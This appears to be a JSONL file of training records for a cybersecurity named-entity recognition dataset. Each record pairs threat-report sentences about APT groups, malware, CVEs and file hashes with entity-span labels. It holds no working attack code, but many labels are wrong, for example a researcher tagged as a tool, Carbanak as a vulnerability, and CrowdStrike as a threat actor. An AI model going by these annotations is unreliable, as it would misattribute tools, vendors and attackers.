{"text": "However , this situation will not last long : given the cybercriminals ’ interest in user bank accounts , the activity of mobile banking Trojans is expected to grow in other countries in 2014 . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate . From this format , we were able to find several C&C URLs , including three additional Hong Kong universities ’ names . A typical web request to the frontend to exploit the SSRF vulnerability on CVE-2022 - 41040 involves some variation of path confusion that references the endpoint as shown below : The backend request for a typical ProxyNotShell exploitation is shown below : Once the PowerShell remoting service can be reached , the second step involves vulnerability CVE-2022 - 41082 being exploited in order to execute arbitrary commands .", "spans": {"MALWARE: decoy files": [[260, 271]], "URL: C&C": [[397, 400]], "VULNERABILITY: SSRF vulnerability": [[521, 539]], "VULNERABILITY: CVE-2022 - 41040": [[543, 559]]}, "info": {"id": "cyberner_stix_train_000273", "source": "cyberner_stix_train"}}
{"text": "The URLs — abused as part of XLoader ’ s C & C — are hidden in three webpages , and the C & C server that XLoader connects to differ per region . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well . During the analysis , we also noticed the “ veter1605_MAPS_10cr0.exe ” file slightly changed run after run , a few hours after the initial discovery the infection chain dropped it with different icons , different suffix , from “ cr0 ” to “ cr24 ” , and appendix from “ veter1605_ ” to “ veter2005_ ” .", "spans": {"MALWARE: XLoader": [[29, 36], [106, 113]], "MALWARE: nbtscan": [[207, 214]], "MALWARE: powercat": [[219, 227]], "FILEPATH: veter1605_MAPS_10cr0.exe": [[350, 374]]}, "info": {"id": "cyberner_stix_train_000274", "source": "cyberner_stix_train"}}
{"text": "4254dc8c368cbc36c8a11035dcd0f4b05d587807fa9194d58f0ba411bfd65842 .", "spans": {"FILEPATH: 4254dc8c368cbc36c8a11035dcd0f4b05d587807fa9194d58f0ba411bfd65842": [[0, 64]]}, "info": {"id": "cyberner_stix_train_000275", "source": "cyberner_stix_train"}}
{"text": "This malware variant also appears to be technically superior to many other banking Trojans being able to use its overlay attack even on Android 6 , which has technical improvements compared to the previous Android versions to prevent such attacks . PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach . The choices are interesting though , many correspond to what looks like the birth year of the controller ( ie . years in the late 1980s and early 1990s ) , and others seem to match what year the malware was launched in ( ie . in the 2000s , relatively close to the current year ) . Mandiant assesses with high confidence that UNC4899 is a cryptocurrency - focused element within the DPRK 's Reconnaissance General Bureau ( RGB ) .", "spans": {"SYSTEM: Android 6": [[136, 145]], "SYSTEM: Android": [[206, 213]], "VULNERABILITY: Flash vulnerability": [[357, 376]], "VULNERABILITY: CVE-2015-5119": [[379, 392]], "THREAT_ACTOR: UNC4899": [[770, 777]]}, "info": {"id": "cyberner_stix_train_000276", "source": "cyberner_stix_train"}}
{"text": "We believe the only benefactor with the power to offer such comprehensive protection would be the government of the nation from which the group operates .", "spans": {}, "info": {"id": "cyberner_stix_train_000277", "source": "cyberner_stix_train"}}
{"text": "We ’ve seen quite a few versions of these implants , which were relatively widespread at some point or still are .", "spans": {}, "info": {"id": "cyberner_stix_train_000278", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have observed the threat actors encrypting data using the password \" admin-windows2014 \" and splitting the RAR archives into parts in the recycler directory , with the same name as the uncompressed data .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "TOOL: RAR": [[123, 126]]}, "info": {"id": "cyberner_stix_train_000279", "source": "cyberner_stix_train"}}
{"text": "This indication that the Dukes planned to use an arsenal of 5 malware toolsets in parallel suggests that they were operating with both significant resources and capacity .", "spans": {"THREAT_ACTOR: Dukes": [[25, 30]]}, "info": {"id": "cyberner_stix_train_000280", "source": "cyberner_stix_train"}}
{"text": "The C & C address was specified in the code and was also unencrypted : In some versions , a dynamically generated low-level domain was used as an address : In its first communication , the Trojan sent the infected device ’ s IMEI to the C & C , and in return it received a set of rules for processing incoming SMSs ( phone numbers , keywords and regular expressions ) – these applied mainly to messages from banks , payment systems and mobile network operators . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL . Overall , an organization will need multilayered security strategies , as Lazarus and other similar groups are experienced cybercriminals who employ different strategies to get past organizational defenses .", "spans": {"MALWARE: IOC files": [[477, 486]], "THREAT_ACTOR: HIDDEN COBRA": [[495, 507]], "TOOL: FALLCHILL": [[530, 539]], "THREAT_ACTOR: Lazarus": [[616, 623]], "THREAT_ACTOR: groups": [[642, 648]], "THREAT_ACTOR: cybercriminals": [[665, 679]]}, "info": {"id": "cyberner_stix_train_000281", "source": "cyberner_stix_train"}}
{"text": "If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc . The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator .", "spans": {"FILEPATH: kontrakt87.doc": [[217, 231]], "ORGANIZATION: telecommunications service": [[253, 279]], "ORGANIZATION: MegaFon": [[294, 301]], "ORGANIZATION: mobile phone operator": [[320, 341]]}, "info": {"id": "cyberner_stix_train_000282", "source": "cyberner_stix_train"}}
{"text": "This unique on-device , just-in-time ( JIT ) approach inspired researchers to dub this malware as “ Agent Smith ” . Using XREFs during static analysis is a common technique to quickly find where functions of interest are called . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . Metamorfo has communicated with hosts over raw TCP on port 9999.[24 ]", "spans": {"MALWARE: Agent Smith": [[100, 111]], "TOOL: XREFs": [[122, 127]], "ORGANIZATION: Kaspersky": [[247, 256]], "VULNERABILITY: zero-day": [[282, 290]], "THREAT_ACTOR: BlackOasis": [[307, 317]], "MALWARE: Metamorfo": [[372, 381]]}, "info": {"id": "cyberner_stix_train_000283", "source": "cyberner_stix_train"}}
{"text": "Other samples we analyzed had different combinations of modification to cryptography and serialization .", "spans": {}, "info": {"id": "cyberner_stix_train_000284", "source": "cyberner_stix_train"}}
{"text": "This entry was posted on Mon Dec 04 12:00 EST 2017 and filed under Code , Reverse Engineering , Nick Harbour , and Incident Response . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East .", "spans": {"MALWARE: entry": [[5, 10]], "TOOL: Reverse Engineering": [[74, 93]], "TOOL: Nick Harbour": [[96, 108]], "THREAT_ACTOR: APT34": [[164, 169]], "VULNERABILITY: CVE-2017-0199": [[260, 273]], "VULNERABILITY: CVE-2017-11882": [[278, 292]]}, "info": {"id": "cyberner_stix_train_000285", "source": "cyberner_stix_train"}}
{"text": "Going one step further , these substrings are sometimes scattered throughout the code , retrieved from static variables and method calls . The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies . ZXARPS Spoofing , redirection , packet capture . The U.S. Government has developed new mechanisms to help Ukraine identify cyber threats and recover from cyber incidents .", "spans": {"ORGANIZATION: telecommunications companies": [[283, 311]], "ORGANIZATION: U.S. Government": [[367, 382]]}, "info": {"id": "cyberner_stix_train_000286", "source": "cyberner_stix_train"}}
{"text": "When all the necessary card details are entered and have been checked , all the information is uploaded to the C & C . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period .", "spans": {"MALWARE: decoy slideshow": [[127, 142]], "THREAT_ACTOR: Leviathan": [[247, 256]], "FILEPATH: macro-laden Microsoft Word documents": [[280, 316]], "ORGANIZATION: development organizations": [[349, 374]]}, "info": {"id": "cyberner_stix_train_000287", "source": "cyberner_stix_train"}}
{"text": "Extract the Wi-Fi network 's password . After getting the IP , the ProjectSauron component tries to communicate with the remote server using its own ( ProjectSauron ) protocol as if it was yet another C&C server . In others , it persuades victims to download a report about a recent political affair pertaining to the Middle East and specifically to Palestinian matters . CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": {"TOOL: ProjectSauron": [[67, 80], [151, 164]], "THREAT_ACTOR: CrowdStrike Services": [[372, 392]], "TOOL: Microsoft Exchange": [[504, 522]], "VULNERABILITY: ProxyNotShell vulnerabilities": [[523, 552]], "VULNERABILITY: CVE-2022 - 41040": [[553, 569]], "VULNERABILITY: CVE-2022 - 41082": [[574, 590]]}, "info": {"id": "cyberner_stix_train_000288", "source": "cyberner_stix_train"}}
{"text": "Since it can use the accessibility service to become the default SMS app , it can also delete the SMS messages so only the attackers can see them . PLATINUM does not conduct its espionage activity to engage in direct financial gain , but instead uses stolen information for indirect economic advantages . As expected , OilRig is continuing their onslaught of attacks well into 2018 with continued targeting in the Middle East .", "spans": {"THREAT_ACTOR: PLATINUM": [[148, 156]], "ORGANIZATION: economic": [[283, 291]], "THREAT_ACTOR: OilRig": [[319, 325]]}, "info": {"id": "cyberner_stix_train_000289", "source": "cyberner_stix_train"}}
{"text": "] us . RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . Filename: winload.dll .", "spans": {"MALWARE: RIPPER": [[7, 13]], "ORGANIZATION: ATM vendors": [[84, 95]], "FILEPATH: winload.dll": [[160, 171]]}, "info": {"id": "cyberner_stix_train_000290", "source": "cyberner_stix_train"}}
{"text": "Patchwork also uses the Delphi file stealer as a similarity with Urpage , which suggests the three groups are somehow related . Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers .", "spans": {"THREAT_ACTOR: Patchwork": [[0, 9]], "VULNERABILITY: CVE-2015-2546": [[136, 149]], "SYSTEM: Windows": [[159, 166]], "THREAT_ACTOR: attackers": [[296, 305]]}, "info": {"id": "cyberner_stix_train_000291", "source": "cyberner_stix_train"}}
{"text": "However , when used maliciously , accessibility features can be used to exploit legitimate services for malicious purposes , like with EventBot . Xagent is the original filename Xagent.exe whereas seems to be the version of the worm . FireEye tracks thousands of threat actors , but pays special attention to state-sponsored attackers who carry out advanced persistent threat ( APT ) attacks .", "spans": {"MALWARE: EventBot": [[135, 143]], "MALWARE: Xagent": [[146, 152]], "MALWARE: Xagent.exe": [[178, 188]], "MALWARE: worm": [[228, 232]], "ORGANIZATION: FireEye": [[235, 242]], "THREAT_ACTOR: actors": [[270, 276]], "THREAT_ACTOR: attackers": [[325, 334]]}, "info": {"id": "cyberner_stix_train_000292", "source": "cyberner_stix_train"}}
{"text": "With each subsequent request , a new subdomain was generated . The McAfee Advanced Threat Research team discovered a previously unknown data-gathering implant that surfaced in mid-February 2018 . These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections .", "spans": {"ORGANIZATION: McAfee Advanced Threat Research": [[67, 98]], "MALWARE: data-gathering implant": [[136, 158]], "MALWARE: RATs": [[304, 308]], "TOOL: C2": [[346, 348]]}, "info": {"id": "cyberner_stix_train_000293", "source": "cyberner_stix_train"}}
{"text": "It is issued by Google once a user successfully logged into this account . BRONZE BUTLER are also fluent in Japanese , crafting phishing emails in native Japanese and operating successfully within a Japanese-language environment . However , Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": {"ORGANIZATION: Google": [[16, 22]], "THREAT_ACTOR: BRONZE BUTLER": [[75, 88]]}, "info": {"id": "cyberner_stix_train_000294", "source": "cyberner_stix_train"}}
{"text": "Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 .", "spans": {"VULNERABILITY: Carbanak": [[11, 19]], "ORGANIZATION: banks": [[79, 84]], "ORGANIZATION: payment systems": [[91, 106]], "FILEPATH: Cyberlink": [[158, 167]], "TOOL: Dynamic Link Library": [[210, 230]]}, "info": {"id": "cyberner_stix_train_000295", "source": "cyberner_stix_train"}}
{"text": "Downeks and Quasar RAT Used in Recent Targeted Attacks Against Governments .", "spans": {"MALWARE: Downeks": [[0, 7]], "MALWARE: Quasar RAT": [[12, 22]]}, "info": {"id": "cyberner_stix_train_000296", "source": "cyberner_stix_train"}}
{"text": "6e896099a3ceb563f43f49a255672cfd14d88799f29617aa362ecd2128446a47 .", "spans": {"FILEPATH: 6e896099a3ceb563f43f49a255672cfd14d88799f29617aa362ecd2128446a47": [[0, 64]]}, "info": {"id": "cyberner_stix_train_000297", "source": "cyberner_stix_train"}}
{"text": "Executives can use this assessment to determine how to reduce risk to their organization's mission and critical assets .", "spans": {}, "info": {"id": "cyberner_stix_train_000298", "source": "cyberner_stix_train"}}
{"text": "CTU researchers have not observed TG-3390 actors performing reconnaissance prior to compromising organizations .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[34, 41]]}, "info": {"id": "cyberner_stix_train_000299", "source": "cyberner_stix_train"}}
{"text": "As the team at Scandinavian security group CSIS describes , malware known as MazarBOT is being distributed via SMS in Denmark and is likely to also be encountered in other countries . Rather , the Gallmaker 's attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools . To handle multiple control flow dispatchers , In one case , certutil was used to decode multiple files related to credential theft .", "spans": {"ORGANIZATION: CSIS": [[43, 47]], "MALWARE: MazarBOT": [[77, 85]], "THREAT_ACTOR: Gallmaker": [[197, 206]], "TOOL: LotL": [[271, 275]], "TOOL: publicly available hack tools": [[288, 317]]}, "info": {"id": "cyberner_stix_train_000300", "source": "cyberner_stix_train"}}
{"text": "Whitefly compromises its victims using custom malware alongside open-source hacking tools and living off the land tactics , such as malicious PowerShell scripts . In April 2013 , a year after we found the \" bodiless \" Lurk module , the Russian cybercriminal underground exploited several families of malicious software that specialized in attacks on banking software .", "spans": {"THREAT_ACTOR: Whitefly": [[0, 8]], "TOOL: PowerShell scripts": [[142, 160]], "MALWARE: Lurk module": [[218, 229]]}, "info": {"id": "cyberner_stix_train_000301", "source": "cyberner_stix_train"}}
{"text": "This makes the taking down and recovery of the network much harder and poses a considerable challenge for defenders . The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro3 similarly detailing the use of EvilGrab malware . OceanLotus : 72441fe221c6a25b3792d18f491c68254e965b0401a845829a292a1d70b2e49a Payload PNG ( loader #1 ) . Mandiant Intelligence assesses with high confidence that operations for which the pro - Russia hacktivist collective KillNet has claimed responsibility consistently mirror Russian strategic objectives , although we have not yet uncovered direct evidence of the collective ’s collaboration with or direction from Russian security services .", "spans": {"THREAT_ACTOR: threat actor": [[122, 134], [278, 290]], "ORGANIZATION: FireEye": [[240, 247]], "TOOL: Poison Ivy malware family": [[305, 330]], "ORGANIZATION: Trend Micro3": [[349, 361]], "TOOL: EvilGrab malware": [[393, 409]], "THREAT_ACTOR: OceanLotus": [[412, 422]], "FILEPATH: 72441fe221c6a25b3792d18f491c68254e965b0401a845829a292a1d70b2e49a": [[425, 489]], "ORGANIZATION: Mandiant Intelligence": [[518, 539]]}, "info": {"id": "cyberner_stix_train_000302", "source": "cyberner_stix_train"}}
{"text": "The user simply needs to text a prescribed keyword to a prescribed number ( shortcode ) . As recently as this past week , researchers observed Chinese hackers escalating cyber-attack efforts to steal military research secrets from US universities . Exit / Quit Exit and shut down the botnet client . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": {"ORGANIZATION: universities": [[234, 246]], "THREAT_ACTOR: CrowdStrike Services": [[338, 358]], "TOOL: Microsoft Exchange": [[464, 482]]}, "info": {"id": "cyberner_stix_train_000303", "source": "cyberner_stix_train"}}
{"text": "Disable potentially harmful SQL-stored procedure calls .", "spans": {}, "info": {"id": "cyberner_stix_train_000304", "source": "cyberner_stix_train"}}
{"text": "Earlier this year , our colleagues at Symantec uncovered an interesting story about the use of Equation group exploitation tools by an alleged Chinese group named Buckeye a.k.a APT3 , or UPS team . February saw three particularly interesting publications on the topic of macOS malware: a Trojan Cocoa application that sends system information including keychain data back to the attacker , a macOS version of APT28’s Xagent malware , and a new Trojan ransomware .", "spans": {"ORGANIZATION: Symantec": [[38, 46]], "THREAT_ACTOR: Equation": [[95, 103]], "THREAT_ACTOR: Buckeye": [[163, 170]], "THREAT_ACTOR: APT3": [[177, 181]], "MALWARE: Trojan": [[288, 294]], "THREAT_ACTOR: attacker": [[379, 387]], "THREAT_ACTOR: APT28’s": [[409, 416]], "FILEPATH: Trojan ransomware": [[444, 461]]}, "info": {"id": "cyberner_stix_train_000305", "source": "cyberner_stix_train"}}
{"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors .", "spans": {"VULNERABILITY: CVE-2012-0158": [[79, 92]], "MALWARE: Microsoft Word": [[104, 118]], "FILEPATH: Okrum malware": [[153, 166]], "FILEPATH: backdoors": [[259, 268]]}, "info": {"id": "cyberner_stix_train_000306", "source": "cyberner_stix_train"}}
{"text": "These new samples targeted Linux- and Unix-based operating systems , vulnerable servers , and internet of things ( IoT ) devices by exploiting known vulnerabilities with available exploits .", "spans": {"SYSTEM: Linux-": [[27, 33]], "SYSTEM: Unix-based": [[38, 48]]}, "info": {"id": "cyberner_stix_train_000307", "source": "cyberner_stix_train"}}
{"text": "While many malware were written in Assembly during the ‘ old days ‘ of curiosity-driven virus writing , it has since become a rarity .", "spans": {"TOOL: Assembly": [[35, 43]]}, "info": {"id": "cyberner_stix_train_000308", "source": "cyberner_stix_train"}}
{"text": "The developer of the code , Shanghai Adups Technology Co. , has apologized , contending that the code was intended for another one of its clients who requested better blocking of junk text messages and marketing calls . For exfiltration of stolen data , APT10 used WinRAR and renamed rar.exe to r.exe to create archives , upload them with curl.exe (renamed to c.exe , and again , use the cloud storage provider Dropbox . Daserf : 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 .", "spans": {"ORGANIZATION: Shanghai Adups Technology Co.": [[28, 57]], "THREAT_ACTOR: APT10": [[254, 259]], "TOOL: WinRAR": [[265, 271]], "MALWARE: rar.exe": [[284, 291]], "MALWARE: r.exe": [[295, 300]], "MALWARE: curl.exe": [[339, 347]], "MALWARE: c.exe": [[360, 365]], "TOOL: Dropbox": [[411, 418]], "MALWARE: Daserf": [[421, 427]], "FILEPATH: 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423": [[430, 494]]}, "info": {"id": "cyberner_stix_train_000309", "source": "cyberner_stix_train"}}
{"text": "My understanding is FireEye labels entities where definitive attribution is not yet possible with the “ TEMP ” moniker ( hence , TEMP.Veles ) – yet in this case FireEye developed and deployed the label , then appeared to move away from it in subsequent reporting .", "spans": {"ORGANIZATION: FireEye": [[20, 27], [161, 168]], "THREAT_ACTOR: TEMP.Veles": [[129, 139]]}, "info": {"id": "cyberner_stix_train_000310", "source": "cyberner_stix_train"}}
{"text": "It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . CTU researchers have observed the Threat Group-3390 employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": {"TOOL: DNS-based attack technique": [[26, 52]], "ORGANIZATION: Arbor 's ASERT Team": [[183, 202]], "ORGANIZATION: CTU": [[239, 242]], "THREAT_ACTOR: Threat Group-3390": [[273, 290]], "ORGANIZATION: Kaspersky": [[312, 321]]}, "info": {"id": "cyberner_stix_train_000311", "source": "cyberner_stix_train"}}
{"text": "Organizations in the government , energy , and technology sectors have been targeted by Magic Hound , specifically organizations based in or doing business in Saudi Arabia . On May 2 , 2016 , Palo Alto Networks published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available .", "spans": {"ORGANIZATION: government": [[21, 31]], "ORGANIZATION: energy": [[34, 40]], "ORGANIZATION: technology sectors": [[47, 65]], "ORGANIZATION: Palo Alto Networks": [[192, 210]], "THREAT_ACTOR: Infy": [[321, 325]]}, "info": {"id": "cyberner_stix_train_000312", "source": "cyberner_stix_train"}}
{"text": "This attack vector is increasingly popular with malicious actors as almost everyone on the planet carries at least one mobile device they interact with throughout any given day . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor . Lazarus Group : HIDDEN COBRA , Guardians of Peace , ZINC , NICKEL ACADEMY .", "spans": {"MALWARE: RoyalDNS malware": [[230, 246]], "MALWARE: Ketrican": [[253, 261]], "THREAT_ACTOR: Lazarus Group": [[278, 291]], "THREAT_ACTOR: HIDDEN COBRA": [[294, 306]], "THREAT_ACTOR: Guardians of Peace": [[309, 327]], "THREAT_ACTOR: ZINC": [[330, 334]], "THREAT_ACTOR: NICKEL ACADEMY": [[337, 351]]}, "info": {"id": "cyberner_stix_train_000313", "source": "cyberner_stix_train"}}
{"text": "INTERNET - open network sockets . In this sample , however , the module names were changed from actors and characters’ names to car models , namely BMW_x1” , BMW_x2” and up to BMW_x8” . One of the most interesting observations made during this analysis is that the amount of development effort devoted to Emissary significantly increased after we published our Operation Lotus Blossom report in June 2015 , resulting in many new versions of the Emissary Trojan .", "spans": {"MALWARE: BMW_x1”": [[148, 155]], "MALWARE: BMW_x2”": [[158, 165]], "MALWARE: BMW_x8”": [[176, 183]], "MALWARE: Emissary": [[305, 313]], "MALWARE: Emissary Trojan": [[445, 460]]}, "info": {"id": "cyberner_stix_train_000314", "source": "cyberner_stix_train"}}
{"text": "Soon after , the customized utility was again evaluated in the malware testing environment .", "spans": {}, "info": {"id": "cyberner_stix_train_000315", "source": "cyberner_stix_train"}}
{"text": "Long before Kryptowire 's announcement , Tim Strazzere , a mobile security researcher with RedNaga Security , contacted BLU Products in March 2015 after he found two vulnerabilities that could be traced to Adup 's code . This campaign brings to light further evidence supporting the assertions made by the Five Eyes nations , led by the U.S Department of Justice indictment against APT10 actors outlining the unprecedented scale of economic cyberespionage being conducted by the Chinese Ministry of State Security . Minzen : 26727d139b593486237b975e7bdf93a8148c52d5fb48d5fe540a634a16a6ba82 .", "spans": {"ORGANIZATION: Kryptowire": [[12, 22]], "ORGANIZATION: RedNaga Security": [[91, 107]], "ORGANIZATION: Adup": [[206, 210]], "THREAT_ACTOR: APT10": [[382, 387]], "ORGANIZATION: economic": [[432, 440]], "MALWARE: Minzen": [[516, 522]], "FILEPATH: 26727d139b593486237b975e7bdf93a8148c52d5fb48d5fe540a634a16a6ba82": [[525, 589]]}, "info": {"id": "cyberner_stix_train_000316", "source": "cyberner_stix_train"}}
{"text": "These repackaged , malware-laden apps are neither on Google Play nor popular third-party app marketplaces , and we only saw the website hosting the malicious apps being promoted on social media when we followed GolfSpy ’ s trail . These rules detect the malware \" beaconing \" to the command-and-control server , the initial malware check-in , and an attempt to download a backdoor module . The main goal behind its malicious activities was to steal financial assets from companies , such as debit cards , or get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts . Kaspersky said there was another case of end users being infected by the malware , which is known as \" Winnti . \"", "spans": {"SYSTEM: Google Play": [[53, 64]], "MALWARE: GolfSpy": [[211, 218]], "TOOL: beaconing": [[264, 273]], "TOOL: command-and-control server": [[283, 309]], "ORGANIZATION: Kaspersky": [[640, 649]], "MALWARE: the malware": [[709, 720]], "MALWARE: Winnti": [[743, 749]]}, "info": {"id": "cyberner_stix_train_000317", "source": "cyberner_stix_train"}}
{"text": "If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": {"MALWARE: document": [[7, 15]], "VULNERABILITY: CVE-2012-0158": [[64, 77]], "VULNERABILITY: CVE-2013-3906": [[80, 93]], "VULNERABILITY: CVE-2014-1761": [[97, 110]], "TOOL: emails": [[248, 254]], "FILEPATH: Microsoft Word attachment": [[262, 287]], "VULNERABILITY: CVE-2017-0199": [[320, 333]], "MALWARE: ZeroT Trojan": [[348, 360]], "MALWARE: PlugX Remote Access Trojan": [[392, 418]], "MALWARE: RAT": [[421, 424]]}, "info": {"id": "cyberner_stix_train_000318", "source": "cyberner_stix_train"}}
{"text": "Using this collection of webshells , the actors moved laterally to other systems on the network by dumping credentials with a variant of the notorious Mimikatz tool and using Impacket ’s atexec tool to use dumped credentials to run commands on other systems .", "spans": {"TOOL: Mimikatz": [[151, 159]], "TOOL: Impacket": [[175, 183]]}, "info": {"id": "cyberner_stix_train_000319", "source": "cyberner_stix_train"}}
{"text": "IMPACT EventBot is a mobile malware banking trojan that steals financial information , is able to hijack transactions . Let’s take a closer look at ITG08’s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": {"MALWARE: EventBot": [[7, 15]], "THREAT_ACTOR: ITG08’s": [[148, 155]], "MALWARE: More_eggs backdoor": [[311, 329]], "MALWARE: PIVY": [[332, 336], [598, 602]], "ORGANIZATION: chemical makers": [[410, 425]], "ORGANIZATION: government agencies": [[428, 447]], "ORGANIZATION: defense contractors": [[450, 469]], "THREAT_ACTOR: attackers": [[540, 549]], "VULNERABILITY: zero-day": [[557, 565]]}, "info": {"id": "cyberner_stix_train_000320", "source": "cyberner_stix_train"}}
{"text": "Pay close attention to the contents of these fields as they appear base64 encoded .", "spans": {}, "info": {"id": "cyberner_stix_train_000321", "source": "cyberner_stix_train"}}
{"text": "Since that report , we continued our research into this oddity .", "spans": {}, "info": {"id": "cyberner_stix_train_000322", "source": "cyberner_stix_train"}}
{"text": "Allows an application to force the device to lock Allows applications to access information about Wi-Fi networks . CIA's arsenal includes numerous local and remote zero days developed by CIA or obtained from GCHQ , NSA , FBI or purchased from cyber arms contractors such as Baitshop . Gallmaker is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017 .", "spans": {"THREAT_ACTOR: CIA's": [[115, 120]], "TOOL: GCHQ": [[208, 212]], "TOOL: NSA": [[215, 218]], "TOOL: cyber arms contractors": [[243, 265]], "THREAT_ACTOR: Gallmaker": [[285, 294]]}, "info": {"id": "cyberner_stix_train_000323", "source": "cyberner_stix_train"}}
{"text": "Malware authors use injected clicks , custom HTML parsers and SMS receivers to automate the billing process without requiring any interaction from the user . APT40 is described as a moderately sophisticated cyber-espionage group which combines access to significant development resources with the ability to leverage publicly available tools . FindDialPass List all the dial-up accounts and passwords . Although attacks on education have been a staple of the ransomware ecosystem for years , Vice Society appears to have specialised in delivering misery to schools , colleges , and universities in a highly unusual way .", "spans": {"THREAT_ACTOR: APT40": [[158, 163]], "TOOL: publicly available tools": [[317, 341]], "ORGANIZATION: education": [[423, 432]], "MALWARE: ransomware": [[459, 469]], "THREAT_ACTOR: Vice Society": [[492, 504]], "ORGANIZATION: schools": [[557, 564]], "ORGANIZATION: colleges": [[567, 575]], "ORGANIZATION: universities": [[582, 594]]}, "info": {"id": "cyberner_stix_train_000324", "source": "cyberner_stix_train"}}
{"text": "The threat actors target a wide range of organizations : CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects , but also targeting other industry verticals and attacking organizations involved in international relations .", "spans": {"ORGANIZATION: CTU": [[57, 60]], "THREAT_ACTOR: TG-3390": [[87, 94]]}, "info": {"id": "cyberner_stix_train_000325", "source": "cyberner_stix_train"}}
{"text": "Continuing to use this artifact , we discovered another domain with the same content body , supservermgr.com .", "spans": {}, "info": {"id": "cyberner_stix_train_000326", "source": "cyberner_stix_train"}}
{"text": "A well-known international organization Military targets in Europe Governments in Europe A government of a South American country An embassy belonging to an Eastern European country .", "spans": {}, "info": {"id": "cyberner_stix_train_000327", "source": "cyberner_stix_train"}}
{"text": "Please note this is not a comprehensive chart of all Zebrocy and Koadic samples we were able to collect .", "spans": {"MALWARE: Zebrocy": [[53, 60]]}, "info": {"id": "cyberner_stix_train_000328", "source": "cyberner_stix_train"}}
{"text": "The module inspects every new disk volume attached to the system .", "spans": {}, "info": {"id": "cyberner_stix_train_000329", "source": "cyberner_stix_train"}}
{"text": "While the motivation for each APT32 private sector compromise varied – and in some cases was unknown – the unauthorized access could serve as a platform for law enforcement , intellectual property theft , or anticorruption measures that could ultimately erode the competitive advantage of targeted organizations . Working backwards from each Internet address , I was able to see that in the last few months of 2018 the hackers behind DNSpionage succeeded in compromising key components of DNS infrastructure for more than 50 Middle Eastern companies and government agencies , including targets in Albania , Cyprus , Egypt , Iraq , Jordan , Kuwait , Lebanon , Libya , Saudi Arabia and the United Arab Emirates .", "spans": {"THREAT_ACTOR: APT32": [[30, 35]], "ORGANIZATION: law enforcement": [[157, 172]], "ORGANIZATION: companies": [[540, 549]], "ORGANIZATION: government agencies": [[554, 573]]}, "info": {"id": "cyberner_stix_train_000330", "source": "cyberner_stix_train"}}
